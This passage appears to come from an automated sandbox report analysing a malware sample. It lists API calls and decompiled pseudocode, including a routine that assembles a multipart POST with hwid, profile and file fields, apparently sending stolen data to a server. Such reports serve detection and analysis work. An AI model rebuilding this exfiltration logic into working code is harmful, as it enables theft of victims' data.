                                                                                • lstrcat.KERNEL32(?,0044125C), ref: 0040EA3B
                                                                                • lstrcat.KERNEL32(?,Content-Disposition: form-data; name="), ref: 0040EA4D
                                                                                • lstrcat.KERNEL32(?,profile), ref: 0040EA5F
                                                                                • lstrcat.KERNEL32(?,"), ref: 0040EA71
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040EA81
                                                                                • lstrcat.KERNEL32(?,0044125C), ref: 0040EA8F
                                                                                • lstrcat.KERNEL32(?,------), ref: 0040EA9D
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040EAB1
                                                                                • lstrcat.KERNEL32(?,0044125C), ref: 0040EABF
                                                                                • lstrcat.KERNEL32(?,Content-Disposition: form-data; name="), ref: 0040EAD1
                                                                                • lstrcat.KERNEL32(?,profile_id), ref: 0040EAE3
                                                                                • lstrcat.KERNEL32(?,"), ref: 0040EAF5
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040EB05
                                                                                • lstrcat.KERNEL32(?,0044125C), ref: 0040EB13
                                                                                • lstrcat.KERNEL32(?,------), ref: 0040EB21
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040EB35
                                                                                • lstrcat.KERNEL32(?,0044125C), ref: 0040EB43
                                                                                • lstrcat.KERNEL32(?,Content-Disposition: form-data; name="), ref: 0040EB55
                                                                                • lstrcat.KERNEL32(?,hwid), ref: 0040EB67
                                                                                • lstrcat.KERNEL32(?,"), ref: 0040EB79
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040EB89
                                                                                • lstrcat.KERNEL32(?,0044125C), ref: 0040EB97
                                                                                • lstrcat.KERNEL32(?,------), ref: 0040EBA5
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040EBB9
                                                                                • lstrcat.KERNEL32(?,0044125C), ref: 0040EBC7
                                                                                • lstrcat.KERNEL32(?,Content-Disposition: form-data; name="), ref: 0040EBD9
                                                                                • lstrcat.KERNEL32(?,file), ref: 0040EBEB
                                                                                • lstrcat.KERNEL32(?,"), ref: 0040EBFD
                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,4124C941,00000000,00000010,00000000), ref: 0040EC06
                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,4124C941,00000000,00000010,00000000), ref: 0040EC15
                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,4124C941,00000000,00000010,00000000), ref: 0040EC22
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,4124C941,00000000,00000010,00000000), ref: 0040EC29
                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,4124C941,00000000,00000010,00000000), ref: 0040EC38
                                                                                • _memmove.LIBCMT ref: 0040EC47
                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,4124C941,00000000), ref: 0040EC5C
                                                                                • _memmove.LIBCMT ref: 0040EC65
                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,4124C941), ref: 0040EC70
                                                                                • lstrlenA.KERNEL32(?,?,00000000), ref: 0040EC81
                                                                                • _memmove.LIBCMT ref: 0040EC8D
                                                                                • lstrlenA.KERNEL32(?,00000000,?), ref: 0040ECA1
                                                                                • HttpSendRequestA.WININET(?,?,00000000), ref: 0040ECB2
                                                                                • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 0040ECC9
                                                                                • StrCmpCA.SHLWAPI(?,200), ref: 0040ECDF
                                                                                • Sleep.KERNEL32(00007530), ref: 0040ECEE
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040ED1D
                                                                                • InternetReadFile.WININET(?,?,000007CF,?), ref: 0040ED32
                                                                                • InternetCloseHandle.WININET(?), ref: 0040ED3F
                                                                                • InternetCloseHandle.WININET(?), ref: 0040ED48
                                                                                • InternetCloseHandle.WININET(?), ref: 0040ED51
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$Internetlstrlen$Heap_memset$CloseHandleHttp_memmove$AllocOpenProcessRequest$ConnectFileInfoOptionQueryReadSendSleep
                                                                                • String ID: "$------$200$Content-Disposition: form-data; name="$Content-Type: multipart/form-data; boundary=----$HTTP/1.1$POST$file$http://$https://$hwid$profile$profile_id
                                                                                • API String ID: 1373257564-4008767662
                                                                                • Opcode ID: 1d7c76dba564244a02aed98f5e0c57bd1df2a12a2588cf99407e56760f5a27e9
                                                                                • Instruction ID: dd835945103ec3598f3916d77717642f797994a67bf189276450913b155d11d8
                                                                                • Opcode Fuzzy Hash: 1d7c76dba564244a02aed98f5e0c57bd1df2a12a2588cf99407e56760f5a27e9
                                                                                • Instruction Fuzzy Hash: AFF125B6840259ABEB209FE0DC8CDDF7BBCEB09705F040422FA05E6161D7789659CF69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 85%
                                                                                			E0041221B(void* __ebx, long* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* __ebp;
                                                                                				signed int _t148;
                                                                                				void* _t157;
                                                                                				intOrPtr _t159;
                                                                                				void* _t166;
                                                                                				long* _t170;
                                                                                				long _t176;
                                                                                				void* _t178;
                                                                                				intOrPtr* _t182;
                                                                                				void* _t186;
                                                                                				long _t189;
                                                                                				void* _t191;
                                                                                				void* _t206;
                                                                                				void* _t214;
                                                                                				void* _t227;
                                                                                				void* _t234;
                                                                                				void* _t240;
                                                                                				long _t245;
                                                                                				void* _t246;
                                                                                				void* _t274;
                                                                                				long* _t276;
                                                                                				void* _t277;
                                                                                				long _t281;
                                                                                				void* _t282;
                                                                                				void* _t283;
                                                                                				void* _t285;
                                                                                				signed int _t292;
                                                                                				void* _t294;
                                                                                				void* _t295;
                                                                                				void* _t296;
                                                                                				void* _t298;
                                                                                				void* _t299;
                                                                                				void* _t300;
                                                                                				void* _t301;
                                                                                				void* _t302;
                                                                                
                                                                                				_t302 = __eflags;
                                                                                				_t274 = __edx;
                                                                                				_t295 = _t294 - 0x70;
                                                                                				_t292 = _t295 - 4;
                                                                                				_t148 =  *0x447674; // 0x4124c941
                                                                                				 *(_t292 + 0x70) = _t148 ^ _t292;
                                                                                				_push(0x28);
                                                                                				E00421975(E0043668C, __ebx, __edi, __esi);
                                                                                				_t245 = 0;
                                                                                				 *((intOrPtr*)(_t292 - 0x34)) =  *((intOrPtr*)(_t292 + 0x7c));
                                                                                				_t276 = __ecx;
                                                                                				_t281 = 0xf;
                                                                                				 *((intOrPtr*)(_t292 - 0x30)) =  *((intOrPtr*)(_t292 + 0x80));
                                                                                				 *(_t292 - 0x20) = __ecx;
                                                                                				 *((intOrPtr*)(_t292 - 0x2c)) = 0;
                                                                                				 *(_t292 - 0x10) = 0;
                                                                                				 *(_t292 - 0x14) = 0;
                                                                                				 *(_t292 + 0x68) = _t281;
                                                                                				 *((intOrPtr*)(_t292 + 0x64)) = 0;
                                                                                				 *((char*)(_t292 + 0x54)) = 0;
                                                                                				 *((intOrPtr*)(_t292 - 4)) = 0;
                                                                                				 *(_t292 + 0x4c) = _t281;
                                                                                				 *((intOrPtr*)(_t292 + 0x48)) = 0;
                                                                                				 *((char*)(_t292 + 0x38)) = 0;
                                                                                				_push(_t292 - 0x14);
                                                                                				_push( *((intOrPtr*)(_t292 + 0x84)));
                                                                                				 *((char*)(_t292 - 4)) = 1;
                                                                                				 *((intOrPtr*)(_t292 - 0x28)) = E00412108(0, _t292 - 0x10, __ecx, _t281, _t302);
                                                                                				_t157 = HeapAlloc(GetProcessHeap(), 8,  *(_t292 - 0x14));
                                                                                				 *(_t292 - 0x18) = _t157;
                                                                                				if(_t157 != 0) {
                                                                                					E0041E985(_t157,  *(_t292 - 0x14),  *(_t292 - 0x10));
                                                                                					_t296 = _t295 + 0xc;
                                                                                					__eflags =  *(_t292 - 0x10);
                                                                                					if( *(_t292 - 0x10) == 0) {
                                                                                						_t282 = HeapFree;
                                                                                					} else {
                                                                                						_t240 = GetProcessHeap();
                                                                                						_t282 = HeapFree;
                                                                                						HeapFree(_t240, 0,  *(_t292 - 0x10));
                                                                                						 *(_t292 - 0x10) = 0;
                                                                                					}
                                                                                					_t159 =  *((intOrPtr*)(_t292 - 0x28));
                                                                                					__eflags = _t159 - 0xff;
                                                                                					if(__eflags != 0) {
                                                                                						 *((intOrPtr*)(_t292 - 0x24)) = _t159;
                                                                                						goto L20;
                                                                                					} else {
                                                                                						_push(_t292 - 0x14);
                                                                                						_push( *(_t292 - 0x18));
                                                                                						E00412108(_t245, _t292 - 0x10, _t276, _t282, __eflags);
                                                                                						HeapFree(GetProcessHeap(), _t245,  *(_t292 - 0x18));
                                                                                						_t227 = HeapAlloc(GetProcessHeap(), 8,  *(_t292 - 0x14));
                                                                                						 *(_t292 - 0x18) = _t227;
                                                                                						__eflags = _t227 - _t245;
                                                                                						if(_t227 != _t245) {
                                                                                							E0041E985(_t227,  *(_t292 - 0x14),  *(_t292 - 0x10));
                                                                                							_t301 = _t296 + 0xc;
                                                                                							__eflags =  *(_t292 - 0x10) - _t245;
                                                                                							if(__eflags != 0) {
                                                                                								HeapFree(GetProcessHeap(), _t245,  *(_t292 - 0x10));
                                                                                								 *(_t292 - 0x10) = _t245;
                                                                                							}
                                                                                							_push(_t292 - 0x14);
                                                                                							_push( *(_t292 - 0x18));
                                                                                							 *((intOrPtr*)(_t292 - 0x24)) = E00412108(_t245, _t292 - 0x10, _t276, _t282, __eflags);
                                                                                							HeapFree(GetProcessHeap(), _t245,  *(_t292 - 0x18));
                                                                                							_t234 = HeapAlloc(GetProcessHeap(), 8,  *(_t292 - 0x14));
                                                                                							 *(_t292 - 0x18) = _t234;
                                                                                							__eflags = _t234 - _t245;
                                                                                							if(_t234 == _t245) {
                                                                                								goto L10;
                                                                                							} else {
                                                                                								E0041E985(_t234,  *(_t292 - 0x14),  *(_t292 - 0x10));
                                                                                								_t296 = _t301 + 0xc;
                                                                                								__eflags =  *(_t292 - 0x10) - _t245;
                                                                                								if(__eflags != 0) {
                                                                                									HeapFree(GetProcessHeap(), _t245,  *(_t292 - 0x10));
                                                                                									 *(_t292 - 0x10) = _t245;
                                                                                								}
                                                                                								L20:
                                                                                								_push(_t292 - 0x14);
                                                                                								_push( *(_t292 - 0x18));
                                                                                								 *(_t292 - 0x1c) = E00412108(_t245, _t292 - 0x10, _t276, _t282, __eflags) + _t161;
                                                                                								HeapFree(GetProcessHeap(), _t245,  *(_t292 - 0x18));
                                                                                								_t166 = HeapAlloc(GetProcessHeap(), 8,  *(_t292 - 0x14));
                                                                                								 *(_t292 - 0x18) = _t166;
                                                                                								__eflags = _t166 - _t245;
                                                                                								if(_t166 == _t245) {
                                                                                									goto L10;
                                                                                								}
                                                                                								E0041E985(_t166,  *(_t292 - 0x14),  *(_t292 - 0x10));
                                                                                								_t298 = _t296 + 0xc;
                                                                                								__eflags =  *(_t292 - 0x10) - _t245;
                                                                                								if( *(_t292 - 0x10) != _t245) {
                                                                                									HeapFree(GetProcessHeap(), _t245,  *(_t292 - 0x10));
                                                                                								}
                                                                                								_t176 = lstrlenA( *(_t292 - 0x18)) + 1 -  *(_t292 - 0x1c);
                                                                                								 *(_t292 - 0x14) = _t176;
                                                                                								_t178 = HeapAlloc(GetProcessHeap(), 8, _t176);
                                                                                								 *(_t292 - 0x10) = _t178;
                                                                                								__eflags = _t178 - _t245;
                                                                                								if(_t178 == _t245) {
                                                                                									L13:
                                                                                									_t276[5] = 0xf;
                                                                                									L4:
                                                                                									_t276[4] = _t245;
                                                                                									 *_t276 = _t245;
                                                                                									E0040381A(_t276, 0x43e028);
                                                                                									E00402C34(_t292 + 0x38, 1, _t245);
                                                                                									E00402C34(_t292 + 0x54, 1, _t245);
                                                                                									_t170 = _t276;
                                                                                									goto L35;
                                                                                								} else {
                                                                                									 *(_t292 + 0x30) = 0xf;
                                                                                									 *(_t292 + 0x2c) = _t245;
                                                                                									 *(_t292 + 0x1c) = _t245;
                                                                                									E0040381A(_t292 + 0x1c,  *(_t292 - 0x18));
                                                                                									 *((char*)(_t292 - 4)) = 2;
                                                                                									_t182 = E0040C689(_t292 + 0x1c, _t292, _t292 + 0x1c,  *(_t292 - 0x1c), lstrlenA( *(_t292 - 0x18)));
                                                                                									__eflags =  *((intOrPtr*)(_t182 + 0x14)) - 0x10;
                                                                                									if( *((intOrPtr*)(_t182 + 0x14)) >= 0x10) {
                                                                                										_t182 =  *_t182;
                                                                                									}
                                                                                									E0041E985( *(_t292 - 0x10),  *(_t292 - 0x14), _t182);
                                                                                									_t299 = _t298 + 0xc;
                                                                                									E00402C34(_t292, 1, _t245);
                                                                                									 *((char*)(_t292 - 4)) = 1;
                                                                                									E00402C34(_t292 + 0x1c, 1, _t245);
                                                                                									_t186 = GetProcessHeap();
                                                                                									_t285 = HeapFree;
                                                                                									HeapFree(_t186, _t245,  *(_t292 - 0x18));
                                                                                									_t189 = lstrlenA( *(_t292 - 0x10)) + 1;
                                                                                									 *(_t292 - 0x14) = _t189;
                                                                                									_t191 = HeapAlloc(GetProcessHeap(), 8, _t189);
                                                                                									_push( *(_t292 - 0x10));
                                                                                									 *(_t292 - 0x18) = _t191;
                                                                                									__eflags = _t191 - _t245;
                                                                                									if(_t191 == _t245) {
                                                                                										L12:
                                                                                										HeapFree(GetProcessHeap(), _t245, ??);
                                                                                										goto L13;
                                                                                									} else {
                                                                                										_push( *(_t292 - 0x14));
                                                                                										_push(_t191);
                                                                                										E0041E985();
                                                                                										_t300 = _t299 + 0xc;
                                                                                										HeapFree(GetProcessHeap(), _t245,  *(_t292 - 0x10));
                                                                                										 *(_t292 - 0x10) = _t245;
                                                                                										 *(_t292 - 0x1c) = _t245;
                                                                                										__eflags =  *((intOrPtr*)(_t292 - 0x24)) - _t245;
                                                                                										if(__eflags <= 0) {
                                                                                											L32:
                                                                                											__eflags =  *((intOrPtr*)(_t292 - 0x28)) - 0xff;
                                                                                											if( *((intOrPtr*)(_t292 - 0x28)) == 0xff) {
                                                                                												 *(_t292 + 0x30) = 0xf;
                                                                                												 *(_t292 + 0x2c) = _t245;
                                                                                												 *(_t292 + 0x1c) = _t245;
                                                                                												E0040381A(_t292 + 0x1c,  *((intOrPtr*)(_t292 - 0x34)));
                                                                                												 *((char*)(_t292 - 4)) = 3;
                                                                                												E0040CFB8(_t292 + 0x38, _t292 + 0x1c);
                                                                                												 *((char*)(_t292 - 4)) = 1;
                                                                                												E00402C34(_t292 + 0x1c, 1, _t245);
                                                                                												E0040C640(_t292 + 0x38,  *((intOrPtr*)(_t292 - 0x30)));
                                                                                												_t206 = E0040C689(_t292 + 0x1c, _t292, _t292 + 0x54,  *((intOrPtr*)(_t292 + 0x48)),  *((intOrPtr*)(_t292 + 0x64)));
                                                                                												 *((char*)(_t292 - 4)) = 4;
                                                                                												E0040CFB8(_t292 + 0x54, _t206);
                                                                                												 *((char*)(_t292 - 4)) = 1;
                                                                                												E00402C34(_t292, 1, _t245);
                                                                                												_t276 =  *(_t292 - 0x20);
                                                                                											}
                                                                                											HeapFree(GetProcessHeap(), _t245,  *(_t292 - 0x18));
                                                                                											_t276[5] = 0xf;
                                                                                											_t276[4] = _t245;
                                                                                											 *_t276 = _t245;
                                                                                											E0040CFB8(_t276, _t292 + 0x54);
                                                                                											E00402C34(_t292 + 0x38, 1, _t245);
                                                                                											E00402C34(_t292 + 0x54, 1, _t245);
                                                                                											_t170 =  *(_t292 - 0x20);
                                                                                											L35:
                                                                                											 *[fs:0x0] =  *((intOrPtr*)(_t292 - 0xc));
                                                                                											_pop(_t277);
                                                                                											_pop(_t283);
                                                                                											_pop(_t246);
                                                                                											return E0041DEB4(_t170, _t246,  *(_t292 + 0x70) ^ _t292, _t274, _t277, _t283);
                                                                                										} else {
                                                                                											goto L28;
                                                                                										}
                                                                                										while(1) {
                                                                                											L28:
                                                                                											_push(_t292 - 0x14);
                                                                                											_push( *(_t292 - 0x18));
                                                                                											_t271 = _t292 - 0x10;
                                                                                											 *((intOrPtr*)(_t292 - 0x2c)) = E00412108(_t245, _t292 - 0x10, _t276, _t285, __eflags);
                                                                                											HeapFree(GetProcessHeap(), _t245,  *(_t292 - 0x18));
                                                                                											_t214 = HeapAlloc(GetProcessHeap(), 8,  *(_t292 - 0x14));
                                                                                											 *(_t292 - 0x18) = _t214;
                                                                                											__eflags = _t214 - _t245;
                                                                                											if(_t214 == _t245) {
                                                                                												goto L10;
                                                                                											}
                                                                                											E0041E985(_t214,  *(_t292 - 0x14),  *(_t292 - 0x10));
                                                                                											_t300 = _t300 + 0xc;
                                                                                											__eflags =  *(_t292 - 0x10) - _t245;
                                                                                											if( *(_t292 - 0x10) != _t245) {
                                                                                												HeapFree(GetProcessHeap(), _t245,  *(_t292 - 0x10));
                                                                                												 *(_t292 - 0x10) = _t245;
                                                                                											}
                                                                                											E0040D70E(1, _t271, _t292 + 0x54, _t292,  *((intOrPtr*)(_t292 - 0x2c)));
                                                                                											 *(_t292 - 0x1c) =  *(_t292 - 0x1c) + 1;
                                                                                											_t276 =  *(_t292 - 0x20);
                                                                                											_t285 = HeapFree;
                                                                                											_t245 = 0;
                                                                                											__eflags =  *(_t292 - 0x1c) -  *((intOrPtr*)(_t292 - 0x24));
                                                                                											if(__eflags < 0) {
                                                                                												continue;
                                                                                											} else {
                                                                                												goto L32;
                                                                                											}
                                                                                										}
                                                                                										goto L10;
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						L10:
                                                                                						__eflags =  *(_t292 - 0x10) - _t245;
                                                                                						if( *(_t292 - 0x10) == _t245) {
                                                                                							goto L13;
                                                                                						}
                                                                                						_push( *(_t292 - 0x10));
                                                                                						goto L12;
                                                                                					}
                                                                                				}
                                                                                				if( *(_t292 - 0x10) != 0) {
                                                                                					HeapFree(GetProcessHeap(), 0,  *(_t292 - 0x10));
                                                                                				}
                                                                                				_t276[5] = _t281;
                                                                                				goto L4;
                                                                                			}






































                                                                                0x0041221b
                                                                                0x0041221b
                                                                                0x0041221c
                                                                                0x0041221f
                                                                                0x00412223
                                                                                0x0041222a
                                                                                0x0041222d
                                                                                0x00412234
                                                                                0x0041223c
                                                                                0x0041223e
                                                                                0x00412249
                                                                                0x0041224b
                                                                                0x0041224c
                                                                                0x00412255
                                                                                0x00412258
                                                                                0x0041225b
                                                                                0x0041225e
                                                                                0x00412261
                                                                                0x00412264
                                                                                0x00412267
                                                                                0x0041226a
                                                                                0x0041226d
                                                                                0x00412270
                                                                                0x00412273
                                                                                0x00412279
                                                                                0x0041227a
                                                                                0x0041227e
                                                                                0x0041228a
                                                                                0x00412296
                                                                                0x0041229c
                                                                                0x004122a1
                                                                                0x004122f1
                                                                                0x004122f6
                                                                                0x004122f9
                                                                                0x004122fc
                                                                                0x00412316
                                                                                0x004122fe
                                                                                0x00412302
                                                                                0x00412308
                                                                                0x0041230f
                                                                                0x00412311
                                                                                0x00412311
                                                                                0x0041231c
                                                                                0x0041231f
                                                                                0x00412324
                                                                                0x004123ff
                                                                                0x00000000
                                                                                0x0041232a
                                                                                0x0041232d
                                                                                0x0041232e
                                                                                0x00412334
                                                                                0x00412344
                                                                                0x00412352
                                                                                0x00412358
                                                                                0x0041235b
                                                                                0x0041235d
                                                                                0x00412384
                                                                                0x00412389
                                                                                0x0041238c
                                                                                0x0041238f
                                                                                0x0041239c
                                                                                0x0041239e
                                                                                0x0041239e
                                                                                0x004123a4
                                                                                0x004123a5
                                                                                0x004123b3
                                                                                0x004123be
                                                                                0x004123cc
                                                                                0x004123d2
                                                                                0x004123d5
                                                                                0x004123d7
                                                                                0x00000000
                                                                                0x004123d9
                                                                                0x004123e0
                                                                                0x004123e5
                                                                                0x004123e8
                                                                                0x004123eb
                                                                                0x004123f8
                                                                                0x004123fa
                                                                                0x004123fa
                                                                                0x00412402
                                                                                0x00412405
                                                                                0x00412406
                                                                                0x00412417
                                                                                0x00412421
                                                                                0x0041242f
                                                                                0x00412435
                                                                                0x00412438
                                                                                0x0041243a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00412447
                                                                                0x0041244c
                                                                                0x0041244f
                                                                                0x00412452
                                                                                0x0041245f
                                                                                0x0041245f
                                                                                0x00412470
                                                                                0x00412475
                                                                                0x0041247f
                                                                                0x00412485
                                                                                0x00412488
                                                                                0x0041248a
                                                                                0x00412371
                                                                                0x00412371
                                                                                0x004122bc
                                                                                0x004122bc
                                                                                0x004122c6
                                                                                0x004122c8
                                                                                0x004122d3
                                                                                0x004122de
                                                                                0x004122e3
                                                                                0x00000000
                                                                                0x00412490
                                                                                0x00412496
                                                                                0x0041249d
                                                                                0x004124a0
                                                                                0x004124a3
                                                                                0x004124ab
                                                                                0x004124c0
                                                                                0x004124c5
                                                                                0x004124c9
                                                                                0x004124cb
                                                                                0x004124cb
                                                                                0x004124d4
                                                                                0x004124d9
                                                                                0x004124e2
                                                                                0x004124ed
                                                                                0x004124f1
                                                                                0x004124fa
                                                                                0x00412500
                                                                                0x00412507
                                                                                0x00412512
                                                                                0x00412516
                                                                                0x00412520
                                                                                0x00412526
                                                                                0x00412529
                                                                                0x0041252c
                                                                                0x0041252e
                                                                                0x00412367
                                                                                0x0041236f
                                                                                0x00000000
                                                                                0x00412534
                                                                                0x00412534
                                                                                0x00412537
                                                                                0x00412538
                                                                                0x0041253d
                                                                                0x0041254b
                                                                                0x0041254d
                                                                                0x00412550
                                                                                0x00412553
                                                                                0x00412556
                                                                                0x004125e4
                                                                                0x004125e4
                                                                                0x004125eb
                                                                                0x004125f3
                                                                                0x004125fa
                                                                                0x004125fd
                                                                                0x00412600
                                                                                0x0041260b
                                                                                0x0041260f
                                                                                0x00412619
                                                                                0x0041261d
                                                                                0x00412628
                                                                                0x0041263a
                                                                                0x00412644
                                                                                0x00412648
                                                                                0x00412653
                                                                                0x00412657
                                                                                0x0041265c
                                                                                0x0041265f
                                                                                0x00412670
                                                                                0x00412672
                                                                                0x00412679
                                                                                0x0041267f
                                                                                0x00412681
                                                                                0x0041268c
                                                                                0x00412696
                                                                                0x0041269b
                                                                                0x0041269e
                                                                                0x004126a1
                                                                                0x004126a9
                                                                                0x004126aa
                                                                                0x004126ab
                                                                                0x004126ba
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041255c
                                                                                0x0041255c
                                                                                0x0041255f
                                                                                0x00412560
                                                                                0x00412563
                                                                                0x0041256e
                                                                                0x00412579
                                                                                0x00412587
                                                                                0x0041258d
                                                                                0x00412590
                                                                                0x00412592
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041259f
                                                                                0x004125a4
                                                                                0x004125a7
                                                                                0x004125aa
                                                                                0x004125b7
                                                                                0x004125b9
                                                                                0x004125b9
                                                                                0x004125c5
                                                                                0x004125ca
                                                                                0x004125d0
                                                                                0x004125d3
                                                                                0x004125d9
                                                                                0x004125db
                                                                                0x004125de
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004125de
                                                                                0x00000000
                                                                                0x0041255c
                                                                                0x0041252e
                                                                                0x0041248a
                                                                                0x004123d7
                                                                                0x0041235f
                                                                                0x0041235f
                                                                                0x00412362
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00412364
                                                                                0x00000000
                                                                                0x00412364
                                                                                0x00412324
                                                                                0x004122a6
                                                                                0x004122b3
                                                                                0x004122b3
                                                                                0x004122b9
                                                                                0x00000000

                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 00412234
                                                                                  • Part of subcall function 00412108: __EH_prolog3_GS.LIBCMT ref: 0041210F
                                                                                  • Part of subcall function 00412108: lstrlenA.KERNEL32(?,0000005C,00412287,?,?,00000028), ref: 00412133
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,00000028), ref: 0041228F
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00412296
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 004122AC
                                                                                • HeapFree.KERNEL32(00000000), ref: 004122B3
                                                                                • _strcpy_s.LIBCMT ref: 004122F1
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00412302
                                                                                • HeapFree.KERNEL32(00000000), ref: 0041230F
                                                                                • GetProcessHeap.KERNEL32(00000000,00000008,00000008,?), ref: 0041233D
                                                                                • HeapFree.KERNEL32(00000000), ref: 00412344
                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 0041234B
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00412352
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00412368
                                                                                • HeapFree.KERNEL32(00000000), ref: 0041236F
                                                                                • _strcpy_s.LIBCMT ref: 00412384
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00412395
                                                                                • HeapFree.KERNEL32(00000000), ref: 0041239C
                                                                                • GetProcessHeap.KERNEL32(00000000,00000008,00000008,?), ref: 004123B7
                                                                                • HeapFree.KERNEL32(00000000), ref: 004123BE
                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 004123C5
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 004123CC
                                                                                • _strcpy_s.LIBCMT ref: 004123E0
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 004123F1
                                                                                • HeapFree.KERNEL32(00000000), ref: 004123F8
                                                                                • GetProcessHeap.KERNEL32(00000000,00000008,00000008,?), ref: 0041241A
                                                                                • HeapFree.KERNEL32(00000000), ref: 00412421
                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00412428
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0041242F
                                                                                • _strcpy_s.LIBCMT ref: 00412447
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00412458
                                                                                • HeapFree.KERNEL32(00000000), ref: 0041245F
                                                                                • lstrlenA.KERNEL32(00000008), ref: 00412464
                                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00412478
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0041247F
                                                                                • lstrlenA.KERNEL32(00000008,00000008), ref: 004124AF
                                                                                • _strcpy_s.LIBCMT ref: 004124D4
                                                                                • GetProcessHeap.KERNEL32(00000000,00000010,00000001,00000000,00000001,00000000,?,?,00000000), ref: 004124FA
                                                                                • HeapFree.KERNEL32(00000000), ref: 00412507
                                                                                • lstrlenA.KERNEL32(?), ref: 0041250C
                                                                                • GetProcessHeap.KERNEL32(00000008,00000001), ref: 00412519
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00412520
                                                                                • _strcpy_s.LIBCMT ref: 00412538
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00412544
                                                                                • HeapFree.KERNEL32(00000000), ref: 0041254B
                                                                                • GetProcessHeap.KERNEL32(00000000,00000010,00000010,?), ref: 00412572
                                                                                • HeapFree.KERNEL32(00000000), ref: 00412579
                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00412580
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00412587
                                                                                • _strcpy_s.LIBCMT ref: 0041259F
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 004125B0
                                                                                • GetProcessHeap.KERNEL32(00000000,00000010), ref: 00412669
                                                                                • HeapFree.KERNEL32(00000000), ref: 00412670
                                                                                • HeapFree.KERNEL32(00000000), ref: 004125B7
                                                                                  • Part of subcall function 0040CFB8: _memmove.LIBCMT ref: 0040CFD4
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free$Alloc_strcpy_s$lstrlen$_memmove$H_prolog3H_prolog3_
                                                                                • String ID:
                                                                                • API String ID: 1785655924-0
                                                                                • Opcode ID: 3780e6f1472f5d67fb6b1c600a7c9fb20c36228bce19c6752e58691872dc19f2
                                                                                • Instruction ID: 953d4677fb6be6a824796c0e113d08cd095a76d61cffae8afb22d791519e0cc5
                                                                                • Opcode Fuzzy Hash: 3780e6f1472f5d67fb6b1c600a7c9fb20c36228bce19c6752e58691872dc19f2
                                                                                • Instruction Fuzzy Hash: 54E119B5C0025AAFDF04EFE5CD499EEBB79FF09304F00042AFA11A2251D7795994CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 64%
                                                                                			E004126BD(void* __ebx, void* __ecx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr* _t114;
                                                                                				intOrPtr _t115;
                                                                                				intOrPtr _t147;
                                                                                				long _t151;
